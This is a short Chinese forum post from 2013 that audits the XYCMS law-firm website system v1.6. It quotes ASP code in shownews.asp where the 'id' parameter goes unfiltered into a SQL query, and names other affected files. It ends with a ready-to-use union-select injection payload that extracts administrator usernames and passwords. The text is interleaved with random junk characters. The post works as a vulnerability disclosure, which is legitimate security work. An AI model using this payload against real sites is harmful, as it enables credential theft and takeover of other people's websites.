前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似* X# E* l9 U" d* R
3 _1 O0 z) k. P. @淫荡分割线( K6 P! }: O7 F0 \2 T8 I! f
--------------------------------------------------------
6 e' m) L. v: U; U
1 J; \( B) g# X9 G审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)# q* l/ Q- V* }% k8 a/ {
源码地址:http://down.chinaz.com/soft/29233.htm5 `6 M1 ]! ^) X% T( h$ ]
$ z% R% d4 @; u7 z) Z7 Q
漏洞文件:shownews.asp
; ^7 K. ^3 V6 @" l漏洞代码:7-13行( l: y6 i( z+ [
, h" o: A5 ~$ D. E5 ~- |
0 H( ?; P9 k' @1 s: i0 A8 x X<%
* R0 l, P% L. Y0 r3 ]% @id=request.QueryString("id"), l/ ]4 s- n* D" `: n
/ r4 U' b- w; z& J8 C. V
set snews=server.createobject("adodb.recordset") & v( T7 e( V# F7 E& L [ n! H, t
exec="select * from [news] where id="&id3 e0 o. _/ l! ^& y
snews.open exec,conn,1,1/ n. d9 t" C& I' ~4 t2 S# l
%>
+ N. T8 ]% p$ n1 X! G- @6 d
! S: ]- ^! a& z7 W0 U7 p+ t # b0 I7 O8 K* C8 O- i
什么过滤都没有 直造成注入) r: [) u7 [( D [. R/ Q5 g0 \
/ ]' l: I, P" \
注入点:http://127.0.0.1:99/shownews.asp?id=xx* H, G% m# ~7 x
* T5 _8 R# P* j: u+ B+ I* Q9 r+ }4 r其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
/ @. q8 H9 i2 O
! k8 n# b) C2 e3 s % i$ t3 B8 h3 z) m
exp: union select 1,admin,password,4,5,7 from admin_user1 u& o% \6 d- ?! N* l7 v
6 Y# o0 S' Q' g+ E( s* _, Y9 p5 q |
发表于 2013-4-4 17:28:12
收藏
支持
反对